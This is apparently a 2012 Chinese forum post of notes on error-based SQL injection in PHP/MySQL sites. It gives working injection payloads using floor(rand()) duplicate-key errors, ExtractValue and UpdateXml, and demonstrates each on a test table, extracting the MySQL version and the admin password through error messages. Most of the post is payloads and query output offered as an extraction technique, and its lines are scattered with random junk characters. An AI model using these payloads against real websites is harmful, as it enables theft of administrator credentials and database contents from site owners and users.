放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
# m2 C% l/ {' k实际测试环境: U) w5 r! f0 c: U& }0 D E& v
! |, L1 x1 z- B, [# D
) S" z. f5 g5 D/ xmysql> show tables;
! k1 C: m: R8 z5 K+----------------+( b8 ]6 D% t0 B1 g2 c
| Tables_in_test |
/ J1 C4 y3 w7 R d+----------------+8 A. i& D6 h- m0 _4 f1 M
| admin |
# X- X( Z. a8 r' V% x8 D| article |
; x- H3 O0 h. J- h( t% \. |+----------------+
$ p2 X% S0 `: Y( I! B$ o. Z
1 o7 Z: }5 _6 q3 Q' d
1 h8 K* m4 K0 H; P6 B" \/ N' j, S 2 z" b q* M: n/ d9 E# Z
mysql> describe admin;
9 S5 G6 x% C+ g8 ^/ X+-------+------------------+------+-----+---------+----------------+: f' Z" I# m8 d5 {+ a
| Field | Type | Null | Key | Default | Extra |
# G7 p$ j( T* M: R+ U: T5 ^1 A; Q+-------+------------------+------+-----+---------+----------------+
6 ]3 H k, l( ^- N| id | int(10) unsigned | NO | PRI | NULL | auto_increment |* a& \; ?* b. J, u9 G
| user | varchar(50) | NO | | NULL | |
1 p: K/ K) H3 A" j| pass | varchar(50) | NO | | NULL | |( {; c+ i. ~* o8 j
+-------+------------------+------+-----+---------+----------------+
: @3 T, o, s4 @2 ~6 p! S 5 J/ {6 y( N4 [2 T$ D
: `% S9 \8 r' R
% m3 M$ T9 G* T
mysql> describe article;
5 y) A9 I& h; ~1 C! H0 q8 r5 o+---------+------------------+------+-----+---------+----------------+
) C: N& r, [% g8 r& ]1 A| Field | Type | Null | Key | Default | Extra |! ^4 h3 e& F: [0 |2 a! N
+---------+------------------+------+-----+---------+----------------+
, k7 z& _7 c+ w$ c( l4 N| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
2 m$ ?2 O, _& m: Z" I| title | varchar(50) | NO | | NULL | |( [* Y7 `! L7 B' d
| content | varchar(50) | NO | | NULL | |
1 F3 z* k5 H. j7 P: r8 m+---------+------------------+------+-----+---------+----------------+
. f4 D1 c: {$ e o' }( |1、通过floor报错9 P7 ?. H% C0 _
可以通过如下一些利用代码" _3 }1 \& S6 p+ q5 z
) U* H' s7 R( Q' @
) u% H$ Q7 q0 {6 v- U6 V$ Y2 `
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
3 w" b1 c: e; N! S* [from information_schema.tables group by x)a);- O8 o, `% G- u+ E( H7 L
1 m6 l! x) O. k7 Y& B8 q2 x, J3 d 3 i+ q& F! u: Q7 }- K7 r
and (select count(*) from (select 1 union select null union select !1)x8 k- V6 [8 Z, ]8 Q; ^& ]
group by concat((select table_name from information_schema.tables limit 1),- Q8 `1 ]. j7 Z! O! |
floor(rand(0)*2)));( i0 ^. v% n# D D" n; } u4 Z
举例如下:
! }8 L6 K' t7 g2 u9 Y首先进行正常查询:+ {4 R7 L+ c0 B+ ^; S" {& A4 D9 r1 i
$ \3 W4 R' R) F9 U
mysql> select * from article where id = 1;5 p5 |* \: L7 @6 }
+----+-------+---------+
7 t6 S7 i, U% R| id | title | content |+ \3 e, P ], C2 U; q0 u
+----+-------+---------+
" v) u" M7 Z; D( }1 M| 1 | test | do it |; I, @: R# s* k" D- U# h* n
+----+-------+---------+
8 T, `* a9 l3 {5 j假如id输入存在注入的话,可以通过如下语句进行报错。
2 M7 e5 @. H8 D1 G: q
) y, Y" |7 m& N0 Q# _ 2 o Q6 _* O ?, ]* n2 S
mysql> select * from article where id = 1 and (select 1 from1 P* r; `9 [ t% X8 K1 F
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);. D9 K k& Y% T9 C/ _
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'+ q* q% ]% R9 K* y
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
5 e- v; `8 x, W4 s% D/ N" l例如我们需要查询管理员用户名和密码:9 f8 R6 _& g% G* \7 r$ x: Y
Method1:3 a+ m1 m- q' X( b& E0 o* A1 S
1 ~5 R3 C1 K6 x
6 c$ u1 D- J h# P
mysql> select * from article where id = 1 and (select 1 from
9 a3 V( g: U' _, o9 W1 u(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
8 m2 `* |6 u! i8 i1 q# Efrom information_schema.tables group by x)a);" R |5 M# @% s' r* Y5 b
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'5 e0 h" z+ M& p( Q! p8 F: F
Method2:- f! E! p- H% f- L, k# X, }) v
/ _4 K D1 G9 F% H2 E % U3 i+ \! x4 k
mysql> select * from article where id = 1 and (select count(*)+ T$ O& o3 F4 g% b) H4 N
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),% f+ j$ a3 j% v
floor(rand(0)*2)));9 U0 A5 _, C+ b1 j7 u
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
* J& W& B5 U" T2、ExtractValue
U! U/ j. G$ ~& g测试语句如下
7 y* z* ], v- L9 C% M7 P
, a% i4 E; }9 L" [) t A$ @: h1 {
2 E, I; N4 C* i1 _* n! ~5 yand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
+ @* M* N$ [* T! U0 d实际测试过程
0 t7 M' ] _ A9 g3 t 3 X: k# H7 d1 {1 x( f
, U, v- {; |% i- {9 h" \. m
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,, L( u. Q/ A3 B, H
(select pass from admin limit 1)));--
X, n, G$ s, m1 }. L0 qERROR 1105 (HY000): XPATH syntax error: '\admin888'/ n% _0 Y' e @$ E9 e
3、UpdateXml9 T2 Y9 x) f( ]! @( u1 ]( C, o! {
测试语句* ]* K9 J5 z7 j8 w- z' v- }# y5 w
6 s+ m9 j" Y- S! C
& L" W+ f5 F+ \3 Sand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
. ?3 F7 V# T$ i( i实际测试过程. X/ u( a* U( U' X8 {4 W
. M2 w2 v* B- c
1 E0 R* p' k# @/ L: P) ^& t( |% _
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,- `+ E3 d6 J: z T: M* e
(select pass from admin limit 1),0x5e24),1));. C& z& z& M% \
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
9 C( Z9 a0 e3 ~% I) `3 SAll, thanks foreign guys.
( x/ J M1 x2 d; d* z7 t, @6 o6 a
$ `4 t& c3 R1 o0 W k8 I$ x6 m7 ]; K6 M, e' N/ R6 @4 w7 _2 `: p9 d
|
发表于 2012-12-10 10:28:51
收藏
支持
反对